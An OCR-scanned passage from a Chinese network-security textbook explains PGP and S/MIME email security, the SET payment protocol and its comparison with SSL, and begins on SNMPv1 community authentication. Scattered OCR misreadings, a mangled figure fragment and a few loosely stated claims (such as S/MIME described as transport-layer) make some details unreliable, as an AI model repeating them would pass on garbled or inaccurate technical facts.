意味 着 对 现 有 的 很 多 应 用 来 说 ,必须 进行 修改 才能 提供 安全 保障 。 


12.4.1 电子 邮件 安全 协议 


安全 E-mail 系统 的 定义 是 : 邮件 内 容 不 暴露 给 第 三 方 ; 确保 E-mail 完整 可 靠 地 到 达 
接收 方 ,而 且 发 送 方 能 够 知道 接收 方 何 时 收取 了 邮件 ; 有 完整 详细 可靠 的 收发 证 明 。 安 
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全 的 E-mail 系统 能 够 实现 在 保密 性 、 身 份 认证 与 数据 完整 性 、 防 抵赖 性 3 个 方面 的 安全 
服务 。 

为 了 保证 电子 邮件 在 Internet 上 安全 运行 ,在 理想 状态 下 ,应 该 共有 一 个 Internet 上 的 
电子 邮件 的 安全 标准 。 所 有 的 邮件 作者 和 厂商 都 要 执行 它 , 就 可 以 在 Internet 上 建立 安全 
的 电子 邮件 系统 。 为 此 ,安全 电子 邮件 先后 提出 了 不 同 的 标准 : PGP、PEM 和 S/MIME。 
目前 国际 上 有 两 大 类 流行 的 邮件 安全 系统 标准 : 端 到 端 安全 邮件 标准 (PGP) 和 传输 层 安 全 
邮件 标准 S/MIME。 

1. PGP 

PGP(Pretty Good Privacy) 是 Phillip Zimmerman 在 1991 年 提出 来 的 , 它 既是 一 种 规 
范 也 是 一 种 应 用 ,已 经 成 为 全 球 范围 内 流行 的 安全 邮件 系统 之 一 。PGP 是 一 个 完整 的 电子 
邮件 安全 软件 包 , 它 包含 4 个 密码 单元 : 对 称 加 密 算法 、 非 对 称 加 密 算法 、 单 向 散 列 算法 以 
及 随机 数 产生 器 。 它 的 特点 是 通过 单 向 散 列 算法 对 邮件 体 进行 签名 ,以 保证 邮件 体 无 法 修 
改 , 使 用 对 称 和 非 对称 密 码 相 结合 的 技术 保证 邮件 体 保密 且 不 可 和 否认。 通信 双方 的 公 钥 发 
布 在 公开 的 地 方 ,如 FTP 站 点 ,而 公 钥 本 身 的 权威 性 则 可 由 第 三 方 (特别 是 收 信 方 信任 的 第 
三 方 ) 进 行 签名 认证 。 

PGP 的 加 密 解 密 过 程 如 下 : 

(1) 根据 一 些 随 机 的 环境 数据 (如 击 键 信息 ) 产 生 一 个 密 钥 。 

(2) 发 送 者 采用 对 称 加 密 算法 ,使 用 会 话 密 钥 对 报 文 进行 加 密 。 

(3) 发 送 者 采用 非 对 称 加 密 算法 ,使 用 接收 者 的 公开 密 钥 对 会 话 密 钥 进行 加 密 ,并 与 加 
密 报 文 结 合 。 

(4) 接收 者 采用 同一 非 对 称 密码 算法 ,使 用 自己 的 私有 密 钥 解 密 和 恢复 会 话 密 钥 。 

(5) 接收 者 使 用 会 话 密 钥 解密 报 文 。 

PGP 的 签名 验证 过 程 如 下 : 

(1) PGP 根据 报 文 内 容 ,利用 单 向 hash 函数 计算 出 定 长 的 报 文摘 要 。 

(2) 发 送 者 用 自己 的 私 钥 对 报 文摘 要 进行 加 密 得 到 数字 签名 。 

(3) 发 送 者 把 报 文 和 数字 签名 一 起 打包 传送 给 接收 者 。 

(4) 接收 者 用 相同 的 单 向 hash 函数 计算 接收 到 的 报 文 的 摘要 。 

(5) 接收 者 用 发 送 者 的 公 钥 解密 接收 到 的 数字 签名 。 

(6) 接收 者 比较 步骤 (4) 步骤 (5) 计 算 的 结果 是 否 相 同 ,相同 则 表示 验证 通过 ,否则 
拒绝 。 

PGP 加 密 签名 过 程 如 下 : 

(1) PGP 根据 报 文 内 容 , 利 用 单 向 hash 函数 计算 出 定 长 的 报 文摘 要 。 

(2) 发 送 者 用 自己 的 私 钥 对 报 文摘 要 进行 加 密 得 到 数字 签名 。 

(3) 发 送 者 把 报 文 和 数字 签名 合并 然后 用 IDEA 对 称 加 密 算法 加 密 。 

(4) 发 送 者 采用 RSA 算法 ,使 用 接收 者 的 公开 密 钥 对 IDEA 会 话 密 钥 进行 加 密 。 

(5) 将 步骤 (3) ,步骤 (4) 的 计算 结果 一 起 发 送 给 接收 者 。 

(6) 接收 者 首先 用 自己 的 私 钥 解 密 出 会 话 密 钥 。 

(7) 接收 者 用 会 话 密 钥 解密 出 邮件 明文 (M) 和 发 送 者 的 数字 签名 (S1) 。 

(8) 接收 者 用 相同 的 单 向 hash 函数 计算 M 的 摘要 。 


(9) 接收 者 用 发 送 者 的 公 钥 解密 数字 签名 Sl1。 

(10) 接收 者 比较 步骤 (8) 步骤 (9) 计 算 的 结果 是 否 相 同 , 相 同 则 表示 验证 通过 ,和 否则 不 
通过 。 

PGP 只 保护 邮件 的 邮件 体 ,对 头 部 信息 则 不 进行 加 密 , 以 便 让 邮件 成 功 地 在 发 送 者 和 
接收 者 的 网 关 之 间 传 递 。PGP 在 每 个 节点 提供 一 对 数据 结构 : 一 个 是 存储 该 节点 的 公开 / 
私有 密 钥 对 ; 另 一 个 是 存储 该 节点 知道 的 其 他 所 有 用 户 的 公开 密 钥 。 这 两 种 数据 结构 被 称 
为 私有 密 钥 环 和 公开 密 钥 环 。PGP 系统 对 用 户 私 钥 的 处 理 办 法 是 让 用 户 为 其 私 钥 指 定 一 
个 口令 ,用 口令 加 密 私 钥 并 保存 在 私有 密 钥 环 中 。 只 有 通过 正确 的 口令 才能 使 用 私 钥 。 所 
以 私 钥 的 安全 性 取决 于 用 户口 令 的 保密 性 。 私 有 密 钥 环 是 一 个 本 地 缓存 ,破译 者 可 以 窃取 
私有 密 钥 环 , 采 用 穷 举 法 试探 出 口令 ,使 私 钥 失 密 。 

在 PGP 系统 中 ,信任 是 双方 之 间 的 直接 关系 ,或 通过 第 三 者 、 第 四 者 的 间接 关系 ,但 任 
意 双 方 之 间 都 是 对 等 的 ,整个 信任 模型 构成 网 状 结构 ,这 就 是 所 谓 的 WEB of Trust。 每 个 
用 户 之 间 的 信任 关系 都 是 通过 网 络 传播 的 ,也 就 是 说 ,在 PGP 中 ,一 旦 相信 了 网 络 中 的 一 个 
用 户 , 则 意味 着 相信 了 网 络 上 的 所 有 用 户 。 这 就 导致 PGP 不 能 在 较 大 范围 的 网 络 中 使 用 ， 
也 不 能 用 于 传输 一 些 机 密 的 敏感 信息 ,而 且 PGP 对 密 钥 的 废除 管理 也 有 缺陷 ,如 果 私 钥 丢 
失 或 损坏 ,几乎 不 可 能 通知 通信 各 方 相关 的 证 书 已 经 不 可 信 。 由 于 这 种 标准 的 可 伸缩 性 差 ， 
对 素 不 相识 的 客户 ,无 法 建立 可 靠 的 信任 关系 ,因此 PGP 标准 只 适用 于 较 小 的 组 织 或 团体 
中 的 保密 E-mail。 

2. S/MIME 

S/MIME 是 Secure/Multipurpose Internet Mail Extension 的 简称 。 它 是 从 PEM 
(Privacy Enhanced Mail) 和 MIME(Internet 邮件 的 附件 标准 ) 发 展 而 来 的 。S/MIME 集成 
了 3 类 标准 : MIME (RFC 1521)、 加 密 消 息 语法 标准 (Cryptographic Message Syntax 
Standard) 和 证 书 请 求 语法 标准 (Certification Request Syntax Standard) 。 

S/MIME 与 PGP 主要 有 两 点 不 同 : 它 的 认证 机 制 依赖 于 层次 结构 的 证 书 认证 机 构 , 所 
有 下 一 级 的 组 织 和 个 人 的 证 书 由 上 一 级 的 组 织 负责 认证 ,而 最 上 一 级 的 组 织 ( 根 证 书 ) 之 间 
相互 认证 ,整个 信任 关系 基本 是 树 状 的 ,这 就 是 所 谓 的 Tree of Trust。 还 有 ,S/MIME 将 信 
件 内 容 加 密 签 名 后 作为 特殊 的 附件 传送 , 它 的 证 书 格式 采用 与 X. 509 V3 相符 的 公 角 证书 。 

IETF 在 RFC 2045 一 RFC 2049 中 定义 的 MIME 规定 ,邮件 主体 除了 ASCII 字符 类 型 
之 外 ,还 可 以 包含 各 种 数据 类 型 。 用 户 可 以 使 用 MIME 增加 非 文 本 对 象 , 比 如 把 图 像 、 音 
频 、 格 式 化 的 文本 或 微软 的 Word 文件 加 到 邮件 主体 中 去 。MIME 中 的 数据 类 型 一 般 是 复 
合 型 的 ,也 称 为 复合 数据 。 由 于 允许 复合 数据 ,用 户 可 以 把 不 同类 型 的 数据 嵌入 到 同一 个 邮 
件 主体 中 。 在 包含 复合 数据 的 邮件 主体 中 , 设 有 边界 标志 , 它 标明 每 种 类 型 数据 的 开始 和 
结束 。 

S/MIME 在 安全 方面 的 功能 又 进行 了 扩展 , 它 可 以 把 MIME 实体 (比如 数字 签名 和 加 
密 信息 等 ) 封 装 成 安全 对 象 。S/MIME 增加 了 新 的 MIME 数据 类 型 ,用 于 提供 数据 保密 、 完 
整 性 保护 ,认证 和 鉴定 服务 等 功能 ,这 些 数据 类 型 包括 “应 用 /pkcs7-MIME” (application/ 
pkcs7-MIME)、“ 复 合 / 已 签名 ”(multipart/signed) 和 “应 用 /pkcs7- 签 名 ”(application/pkcs7- 
signature) 等 。 如 果 邮 件 包含 了 上 述 MIME 复合 数据 ,邮件 中 将 带 有 有 关 的 MIME 附件 。 
在 邮件 的 客户 端 ,接收 者 在 阅读 邮件 之 前 ,S/MIME 应 用 处 理 这 些 附 件 。 如 表 12. 2 所 示 ， 
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附件 的 扩展 名 因 复 合 数据 类 型 所 提供 的 S/MIME 服务 的 不 同 而 异 。 
表 12.2 S/MIME 的 各 种 服务 


MISE 内 容 类 型 MISE 子 类 型 S/MIME 类 型 S/MIME 服务 扩展 名 

应 用 pkcs7-MIME 签名 数据 保证 数据 的 完整 性 、 认 证 和 无 法 . p7m 
否认 接收 ; 使 用 不 透明 签名 

应 用 pkcs7-MIME 封装 数据 保证 数据 的 真实 性 . p7m 

复合 Signed NA 保证 数据 的 完整 性 ,认证 和 无 法 NA 
否认 接收 ; 使 用 透明 签名 

应 用 pkcs7-signature NA 保证 数据 的 完整 性 ,认证 和 无 法 .p7s 


否认 接收 ; 使 用 透明 签名 


用 户 可 以 使 用 application/pkcs7-MIME 数据 类 型 或 multipart/signed 和 application/ 
pkcs7-signature 等 复合 数据 类 型 标记 邮件 的 邮件 主体 。 每 个 应 用 执行 不 同 的 签名 类 型 : 透 
明 的 (clear) 和 不 透明 的 (opaque)。 这 两 种 签名 类 型 可 以 在 S/MIME 和 非 S/MIME 邮件 客 
户 端 之 间 交 换 已 签名 的 邮件 。 透 明 签名 的 邮件 把 数字 签名 同 已 签名 的 数据 区 分 开 来 ,不 透 
明 的 签名 邮件 将 签名 和 信息 绑 定 在 同一 个 二 进 制 文件 中 。 

在 MIME 的 头 部 ,标识 了 MIME 附件 的 名 字 。 一 些 邮件 客户 端 ,如 果 没 有 安装 具有 S/ 
MIME 能 力 的 系统 ,或 安装 的 是 早期 S/MIME 的 版 本 ,也 需要 通过 这 些 附件 来 识别 邮件 中 
和 S/MIME 有 关 的 内 容 。 其 他 邮件 客户 端 则 更 是 完全 依靠 复合 数据 信息 识别 MIME 实体 。 

S/MIME 只 保护 邮件 的 邮件 主体 ,对 头 部 信息 则 不 进行 加 密 , 以 便 让 邮件 成 功 地 在 发 
送 者 和 接收 者 的 网 关 之 间 传递 。 


12.4.2 SET 协议 


SET(Secure Electronic Transaction ) 协 议 是 由 VISA 和 MasterCard 等 国际 信用 卡 组 
织 于 1997 年 提出 的 一 种 电子 商务 协议 , 它 被 设计 为 开放 的 电子 交易 信息 加 密 和 安全 的 规 
范 ,可 为 Internet 上 的 电子 交易 提供 整套 安全 解决 方案 : 确保 交易 信息 的 保密 性 和 完整 性 ; 
确保 交易 参与 方 身份 的 合法 性 ; 确保 交易 的 不 可 抵赖 性 。SET 本 身 不 是 一 个 支付 系统 , 它 
是 一 个 安全 协议 和 格式 规范 的 集合 。 它 可 以 使 用 户 以 一 种 安全 的 方式 在 公共 、 开 放 的 
Internet 上 传送 银行 账户 等 敏感 信息 。 从 本 质 上 讲 ,SET 提供 了 3 种 服务 : 

。 在 参与 交易 的 各 方 之 间 建 立 安全 的 通信 信道 。 

。 通过 使 用 符合 X. 509 规定 的 数字 证 书 来 提供 身份 认证 和 信任 。 

。 为 了 保证 安全 性 ,只 有 在 必要 的 时 候 、 必 要 的 交易 阶段 才 向 必要 的 交易 参与 方 提供 

必要 的 交易 信息 。 

1. SET 协议 的 主要 特征 

1) 信息 的 保密 性 

信息 的 保密 性 即 客户 的 账号 、 密 码 等 支付 信息 在 通过 网 络 传 输 的 时 候 应 该 是 安全 的 。 
它 区 别 于 SSL 的 一 个 最 重要 的 特征 是 ,防止 商家 得 到 客户 的 信用 卡号 码 。 因 为 支付 信息 应 
该 是 只 有 银行 才 可 以 看 到 的 。 同 样 .也 应 该 防止 银行 看 到 客户 的 订单 信息 ,订单 信息 应 该 是 
只 有 商家 才 可 以 看 到 的 。 这 样 明显 的 职责 分 割 将 提高 整个 交易 过 程 的 保密 性 。 


2) 数据 的 完整 性 

数据 的 完整 性 即 客户 的 订单 信息 和 支付 信息 ,以 及 商家 向 银行 所 发 出 的 支付 授权 的 内 
容 均 应 该 在 传输 的 过 程 中 保持 原来 的 样子 ,而 不 能 被 不 怀 好 意 的 人 修改 。 而 且 还 应 该 保证 ， 
即使 被 别人 修改 之 后 ,在 交易 的 下 一 个 环节 中 ,交易 参与 方 可 以 及 时 发 现 并 中 止 本 次 电子 交 
易 的 过 程 ,然后 等 待 有 效 信息 的 到 来 。 

3) 不 可 抵赖 性 

不 可 抵赖 性 即 可 在 交易 过 程 中 判断 当前 交易 的 参与 方 是 否 是 合法 认证 证 书 的 持 有 者 ， 
以 及 是 否 是 他 所 声称 的 那个 人 。 这 样 ,通过 身份 认证 的 交易 参与 方 将 对 交易 过 程 中 发 生 的 
一 切 相关 责任 负责 。 

2. SET 认证 协议 过 程 流 分 析 

在 Internet 上 实现 一 个 完整 的 SET 交易 主要 包括 5 大 环节 ,分 别 是 客户 /商家 /银行 注 
册 申 请 证 书 、 客 户 /商家 /银行 身份 认证 、 购 买 请 求 、. 交 易 认 证 支付 发 货 。 这 些 环节 中 涉及 客 
户 、 商 家 ,银行 .CA 认证 中 心 4 个 实体 之 间 的 交互 。 总 的 来 说 ,前 一 个 环节 是 下 一 个 环节 的 
必要 条 件 , 如 果 前 一 个 环节 没有 成 功 通过 ,那么 下 一 个 环节 就 不 能 进行 ,其 大 致 过 程 如 下 。 

1) 客户 /商家 /银行 注册 申请 证 书 

首先 ,客户 /商家 /银行 选择 网 络 连 接 、 电 话 连接 和 邮件 连接 3 种 不 同 的 连接 方式 ,发 出 
注册 申请 的 请 求 。 然 后 ,CA 认证 中 心 提供 相应 的 注册 表单 供 申 请 方 填写 。 申 请 方 填写 完 
成 之 后 提交 注册 信息 。CA 认证 中 心 在 对 申请 方 提供 的 注册 信息 确认 无 虚假 信息 之 后 , 生 
成 相应 的 证 书 。 并 通过 多 种 方式 发 送 给 申请 方 。 对 同一 个 申请 实体 来 说 ,这 个 步骤 一 般 只 
需 进 行 一 次 ,以 后 申请 方 就 可 以 使 用 第 一 步 获 得 的 证 书 进 行 电子 交易 了 。 

2) 客户 /商家 /银行 身份 认证 

在 进行 每 一 次 电子 交易 的 时 候 ,都 需要 对 参与 本 次 电子 交易 的 实体 进行 身份 认证 ,以 保 
证 参与 实体 同 他 所 声称 的 实体 是 一 致 的 。 客 户 方 在 验证 商家 的 身份 的 时 候 , 需 要 向 商家 发 
出 身份 认证 请 求 。 这 时 商家 可 以 通过 将 一 段 明 文 用 私 钥 进 行 加 密 数 字 签 名 之 后 传送 给 客户 
方 。 客 户 方 通过 从 CA 认证 中 心 获 得 商家 的 证 书 之 后 ,用 证 书 中 的 公 钥 对 数字 签名 进行 验 
证 。 验 证 成 功 之 后 就 可 以 证 明 对 方 就 是 该 证 书 对 应 的 私 钥 的 持 有 者 ,从 而 完成 了 身份 认证 。 
其 他 实体 之 间 的 身份 认证 类 似 。 只 有 客户 /商家 /银行 三 方 的 身份 认证 都 完成 之 后 才能 够 进 
行 具体 的 电子 交易 ,否则 电子 交易 就 会 被 任何 一 方 拒绝 ,同时 电子 交易 的 认证 也 会 被 CA 认 
证 中 心 拒绝 。 

3) 交易 请 求 

客户 一 般 是 通过 浏览 商家 所 提供 的 商品 目录 开始 电子 交易 的 。 客 户 通过 对 目录 中 感 兴 
趣 的 商品 进行 询 价 ,然后 商家 对 商品 给 出 报价 。 通 过 几 个 回合 的 磋商 之 后 ,客户 和 商家 之 间 
达成 初步 协议 。 客 户 填 写 订 单 信息 和 支付 信息 ,向 商家 发 出 交易 请 求 。 

4) 交易 认证 

客户 方 发 出 的 交易 请 求 中 需要 经 过 CA 认证 中 心 的 加 密 和 数字 签名 ,以 保证 请 求 信息 
在 公用 网 上 的 保密 性 、 完 整 性 和 不 可 否认 性 。 然 后 商家 收 到 的 交易 请 求 也 需要 CA 认证 中 
心 来 验证 其 合法 性 ,并 且 将 订单 信息 和 支付 信息 分 离开 ,分 别 交 给 商家 和 银行 来 处 理 。 

5) 支付 发 货 

在 支付 发 货 环节 中 ,需要 商家 和 银行 之 间 协 调处 理 。 商 家 首先 向 银行 发 出 支付 授权 。 
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支付 授权 主要 用 来 验证 客户 方 提供 信息 的 支付 能 力 , 如 账户 名 和 密码 是 否 正确 以 及 账户 内 
余额 是 否 够 本 次 交易 使 用 等 。 在 支付 授权 通过 之 后 ,商家 继续 请 求 银 行进 行 实际 的 支付 。 
银行 支付 完成 之 后 ,商家 就 通过 第 三 方 的 物流 向 客户 方 发 货 。 同 时 需要 将 发 货 通知 单 和 发 
票 等 电子 票据 发 送 给 客户 。 从 而 完成 了 整个 电子 交易 过 程 。 

可 以 看 出 ,整个 SET 认证 协议 的 过 程 流 通过 CA 认证 中 心 的 介入 较 好 地 解决 了 电子 交 
易 参 与 方 之 间 复 杂 的 信任 关系 和 安全 连接 等 问题 ,确保 了 电子 交易 中 信息 的 真实 性 、 保 密 
性 、 完 整 性 和 不 可 抵赖 性 。CA 认证 中 心 所 起 的 作用 十 分 重要 。 它 协调 客户 、 商 家 、 银 行 三 
方 实体 之 间 复 杂 而 又 微妙 的 交互 ,并 提供 各 种 公共 信息 和 公共 服务 的 访问 平台 ,是 SET 认 
证 协议 中 的 核心 部 分 。 

图 12. 29 由 SET 认证 的 协议 模型 及 其 语义 模型 两 部 分 组 成 。 语 义 模 型 部 分 由 
图 12. 30 框 内 巴 科斯 范式 描述 ,并 自 顶 向 下 进行 逐 层 分 解 。 首 先 ,SET 认证 协议 的 语义 模 
型 分 为 信息 流 、 过 程 流 的 流程 语义 描述 与 逻辑 操作 符 语义 描述 两 部 分 ; 其 次 ,对 流程 语义 中 
涉及 的 具体 流程 流程 所 使 用 的 资源 、 所 处 环境 、 流 程 一 资源 一 环境 的 组 合 实例 进一步 分 解 ， 
其 中 实例 包括 EMP、EBP、DMS、DBS、QCS、YCP 等 , 它 是 可 以 扩展 的 实例 集合 ,如 果 业 务 
需要 还 可 以 有 Ecp 等 实例 。 从 结构 上 讲 , 实 例 的 结构 是 一 个 三 元 组 ,其 形式 为 二 (流程 )( 环 
境 ) (资源 ) 二 ,只 不 过 为 了 突出 其 流程 语义 ,将 (环境 ) 和 (资源 ) 做 了 (流程 ) 的 下 标 。 然 后 对 
协议 模型 中 国 圈 内 代表 信息 流 加 工 处 理 单元 的 逻辑 操作 符 进行 定义 ,指定 操作 符 “ | ”、 
“十 ”“ 一 ”的 逻辑 控制 和 运算 功能 。 从 而 给 出 了 一 个 可 扩展 的 协议 模型 定义 框架 。 

在 图 12. 29 所 描述 的 SET 认证 协议 流程 中 ,通过 对 5 个 关键 点 的 状态 查询 和 控制 可 以 
对 SET 认证 过 程 进行 简单 而 有 效 的 协调 。 


[加密 认证 信息 | 客户 签名 
+Qss 
认证 信息 签名 加 密 认 证 信息 上 一 | 客户 签名 验证 


| 
本 一 | 认证 信息 签名 


图 12. 29 SET 认证 协议 模型 


SET 认证 协议 语义 模型 :: = 流程 语义 | 逻辑 操作 符 语义 
流程 语义 : :一 (流程 ,资源 ,环境 ,实例 ) 

流程 :: 一 { 加 密 E, 解 密 D, 签 名 Q, 验 证 Y} 
资源 : :一 { 公 钥 P, 私 钥 S} 

环境 :: 二 {客户 C, 商 家 M, 银 行 B} 

实例 ::={ EMP,EBP,DMS,DBS,QCS,YCP)} 

逻辑 操作 符 语 义 : :一 (与 逻辑 ,封装 逻辑 , 解 封 逻 辑 ) 

与 逻辑 :: 二 {上 ,表示 同步 控制 } 

封装 逻辑 :: 二 {十 ,表示 信息 的 串联 封装 } 

解 封 逻辑 : :一 (一 ,表示 串联 信息 的 解 封 } 


图 12.30 SET 认证 协议 的 语义 模型 


(1) 身份 认证 成 功 。 即 图 12. 29 中 关键 点 四 所 示 , 它 处 于 交易 各 方 身 份 认证 完成 之 后 。 
关键 点 人 同步 多 个 交易 参与 方 的 身份 认证 结果 ,只 要 一 方 的 认证 没有 成 功 通过 ,就 意味 着 交 
易 一 方 可 能 存在 着 欺诈 行为 ,交易 将 无 法 继续 进行 。 

(2) 认证 信息 签名 成 功 。 即 图 12. 29 中 关键 点 加 所 示 , 它 处 于 客户 方 提 交 的 订单 信息 
和 支付 信息 按照 约定 结构 封装 之 后 。 封 装 数据 时 需要 使 用 商家 和 银行 的 公 钥 分 别 对 交易 信 
息 的 不 同 部 分 加 密 , 以 保证 支付 信息 对 商家 的 透明 性 和 订单 信息 对 银行 的 透明 性 ,这 是 
SET 相对 于 SSL 协议 最 明显 的 区 别 之 一 。 最 后 通过 RSA 算法 对 加 密 后 的 交易 信息 签名 以 
保证 交易 的 不 可 抵赖 性 。 

(3) 认证 信息 签名 验证 成 功 。 即 图 12. 29 中 关键 点 @ 所 示 , 它 处 于 对 约定 的 封装 结构 
中 的 信息 认证 成 功 之 后 。 首 先 需 要 将 签名 后 的 认证 信息 解 封 , 解 封 过 程 是 关键 点 四 中 按照 
约定 数据 结构 封装 交易 信息 的 逆 过 程 。 通 过 对 解 封 后 信息 的 验证 ,可 以 检验 最 终 送 达 商家 
和 银行 的 交易 信息 的 准确 性 和 完整 性 。 

(4) 支付 授权 成 功 。 即 图 12. 29 中 关键 点 四 所 示 , 它 处 于 支付 授权 之 后 。 在 将 加 密 的 
信息 恢复 出 来 ,并 分 离 出 订单 信息 交付 商家 支付 信息 交付 银行 之 后 ,相应 支付 信息 才 生 效 
并 可 授权 银行 进行 支付 。 支 付 信息 的 验证 是 商家 触发 的 ,如 果 支 付 信息 无 效 , 如 账户 余额 不 
是、 账户 密码 错误 等 ,应 该 及 时 停止 实际 的 交易 转账 行为 。 因 此 需 严格 与 关键 点 @@ 和 关键 点 
加 区 分 开 来 并 提供 状态 查询 。 

(5) 支付 成 功 。 即 图 12. 29 中 关键 点 @ 所 示 , 需 同步 商家 对 订单 信息 的 确认 和 银行 支 
付 的 结果 ,因此 也 需 提供 实时 状态 查询 。 

这 5 个 关键 点 的 抽象 ,展现 了 SET 认证 协议 模型 的 一 种 固有 特性 : 它 不 仅仅 支持 实时 
的 认证 ,同样 也 支持 分 时 异步 认证 ,只 需要 在 规定 的 有 效 业 务 时 间 之 内 即 可 。 因 为 交易 认证 
进行 的 当前 状态 可 以 被 记录 ,所 以 认证 活动 可 在 有 效 业务 时 间 内 从 当前 状态 开始 继续 进行 ， 
这 为 SET 认证 带 来 了 更 多 的 灵活 性 ,并 可 以 支持 除 网 络 实时 认证 之 外 的 邮件 认证 .电话 认 
证 等 多 种 认证 模式 。 

3. SET 交易 实例 

SET 交易 的 购买 请 求 过 程 如 图 12. 31 所 示 。 

(1) 持 卡 者 向 商家 发 出 购买 初始 化 请 求 (PurchaseInitReq) ,请 求 得 到 商家 和 支付 网 关 
的 数字 证 书 的 副本 。 
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图 12.31 SET 交易 实例 


(2) 商家 收 到 PurchaseInitReq 后 ,对 其 请 求 进行 响应 , 
。 向 支付 网 关 发 出 证 书 请 求 信 息 CertificateRequest', 获 取 支 付 网 关 证 书 。 
。 产生 响应 消息 PurchaseInitRes ,并 进行 数字 签名 。 
(3) 持 卡 人 接收 响应 ,验证 商家 和 支付 网 关 证 书后 并 保存 ,发 出 购买 请 求 PurchaseReq， 
然后 执行 如 下 操作 : 
。 产生 定购 信息 OI (Order Information) 和 支付 指令 PI (Payment Instructions) 。 
。 构造 双 签 名 DoubleSig (Double Signature) 。 
。 产生 会 话 密 钥 : SessionKeyl 和 SessionKey2 。 
。 构造 通过 商家 发 给 支付 网 关 的 持 卡 人 的 支付 授权 信息 CH_PG_PayAuth。 
。 DoubleSig 构造 持 卡 人 的 支付 授权 信息 。 
。 用 SessionKeyl 加 密 CH_PayAuth, 生 成 持 卡 人 给 支付 网 关 的 数字 信封 。 
。 构造 CH_PG_PayAuth, 以 及 持 卡 人 发 给 商家 的 购买 请 求 CH_M_PurchaseReq。 
。 用 SessionKey2 加 密 后 ,生成 持 卡 人 给 商家 的 数字 信封 ,向 商家 发 送 CH_M_ 
PurchaseReq。 
(4) 商家 接收 到 CH_M_PurchaseReq 后 ,执行 以 下 操作 : 
。 打开 信封 ,通过 会 话 密 钥 解密 ,获取 购买 请 求 信息 PurchaseReq。 
。 从 PurchaseReq 中 得 到 持 卡 人 证 书 , 验 证 该 证 书 , 提 取 持 卡 人 的 公 钥 ; 同时 还 能 得 到 
是 订购 信息 OI, 验 证 其 完整 性 ,防止 自 改 和 抵赖 。 
。 把 购买 响应 消息 (PurchaseRes) 回 传 给 持 卡 人 ,并 对 其 进行 签名 。 由 商家 对 
PurchaseRes 消息 中 用 于 确认 订购 的 响应 数据 进行 数字 签名 。 
(5) 持 卡 人 接收 到 购买 响应 PurchaseRes 后 ,执行 如 下 操作 
。 验证 商家 签名 和 数字 证 书 。 
。 保存 商家 的 购物 响应 。 
4. SET 协议 与 SSL 协议 的 比较 
1) 认证 方面 
早期 的 SSL 并 没有 提供 商家 身份 认证 机 制 ,虽然 在 SSL 3.0 中 可 以 通过 数字 签名 和 数 
字 证 书 可 实现 浏览 器 和 Web 服务 器 双方 的 身份 验证 ,但 仍 不 能 实现 多 方 认证 ; SET 的 安全 
要 求 较 高 ,所 有 参与 SET 交易 的 成 员 ( 持 卡 人 、 商 家 ,发卡 行 、 收 单行 和 支付 网 关 ) 都 必须 申 
请 数字 证 书 进行 身份 识别 。 


2) 安全 性 方面 

SET 协议 规范 了 整个 商务 活动 的 流程 ,从 持 卡 人 到 商家 ,到 支付 网 关 , 到 认证 中 心 以 及 
信用 卡 结算 中 心 之 间 的 信息 流 走向 和 必须 采用 的 加 密 、 认 证 都 制定 了 严密 的 标准 ,从 而 最 大 
限度 地 保证 了 商务 性 、 服 务 性 ,协调 性 和 集成 性 ; SSL 只 对 持 卡 人 与 商店 端的 信息 交换 进行 
加 密 保 护 , 可 以 看 作 是 用 于 传输 的 那 部 分 的 技术 规范 。 从 电子 商务 特性 来 看 , 它 并 不 具备 商 
务 性 .服务 性 ,协调 性 和 集成 性 ,因此 SET 的 安全 性 比 SSL 高 。 

3) 在 网 络 层 协议 位 置 方面 

SSL 是 基于 传输 层 的 通用 安全 协议 ; SET 位 于 应 用 层 , 对 网 络 上 其 他 各 层 也 有 涉及 。 

4) 应 用 领域 方面 

SSL 主要 是 和 Web 应 用 一 起 工作 ,而 SET 是 为 信用 卡 交易 提供 安全 ; 如 果 电 子 商务 
应 用 只 是 通过 Web 或 是 电子 邮件 , 则 可 以 不 要 SET; 但 如 果 电子 商务 应 用 是 一 个 涉及 多 方 
交易 的 过 程 , 则 使 用 SET 更 安全 、 更 通用 。 


12.4.3 SNMP 协议 


SNMP 协议 在 研发 之 初 并 没有 过 多 地 考虑 协议 本 身 的 安全 问题 ,因为 当时 网 络 规模 比 
较 小 。 随 着 Internet 的 迅猛 发 展 , 网 络 规模 不 断 扩大 ,SNMP 安全 问题 越 来 越 成 为 其 发 展 的 
障碍 ,为 此 IETF 工作 组 在 不 断 努 力 , 试 图 改变 这 种 局 面 。 在 IETF 的 努力 下 ,从 SNMPv2 
开始 ,在 研发 SNMP 协议 时 ,安全 问题 得 到 充分 考虑 。SNMPv3 在 安全 方面 发 挥 到 了 目前 
情况 下 SNMP 协议 的 极致 。 本 节 主 要 介绍 SNMP 协议 的 安全 机 制 。 

1. SNMPv1l 安全 机 制 

SNMPvl 的 安全 机 制 很 简单 ,只 是 验证 SNMP 消息 中 的 团体 名 。 属 于 同一 团体 的 管理 
和 被 管理 代理 才能 互相 作用 ,发 送 给 不 同 团体 的 报 文 被 忽略 。 

1) 团体 (Community) 的 概念 

SNMP 网 络 管理 是 一 种 分 布 式 应 用 。 这 种 应 用 的 特点 是 管理 站 和 被 管理 站 之 间 的 关 
系 可 以 是 一 对 多 的 关系 , 即 一 个 管理 站 可 以 管理 多 个 代理 ,从 而 管理 多 个 被 管理 设备 。 另 一 
方面 ,管理 站 与 代理 之 间 还 可 能 存在 多 对 一 的 关系 。 代 理 控制 自己 的 管理 信息 库 , 也 控制 多 
个 管理 站 对 管理 信息 库 的 访问 。 另 外 ,委托 代理 也 可 能 按照 预定 的 访问 策略 控制 对 其 代理 
的 设备 的 访问 。 

SNMP 的 团体 是 一 个 代理 和 多 个 管理 站 之 间 的 认证 和 访问 控制 关系 。 人 允许 访问 的 团 
体 名 是 在 被 管理 系统 一 侧 定义 的 。 一 般 来 说 ,代理 系统 可 以 对 不 同 的 团体 定义 不 同 的 访问 
控制 策略 ,每 一 个 团体 被 赋予 一 个 唯一 的 名 字 。 管 理 站 只 能 以 代理 认可 的 团体 名 行使 其 访 
间 权 。 另 一 方面 由 于 团体 名 的 有 效 范围 局 限于 定义 它 的 代理 系统 中 ,所 以 一 个 管理 站 可 能 
以 不 同 的 名 字 出 现在 不 同 的 代理 中 , 即 管理 站 实体 可 以 用 不 同 的 名 字 对 不 同 的 代理 实施 不 
同 的 访问 权限 。 反 之 ,如 果 两 个 代理 定义 了 同一 团体 名 ,这 种 名 字 的 相似 性 也 不 意味 着 它们 
属于 同一 团体 。 

2) 简单 的 认证 服务 

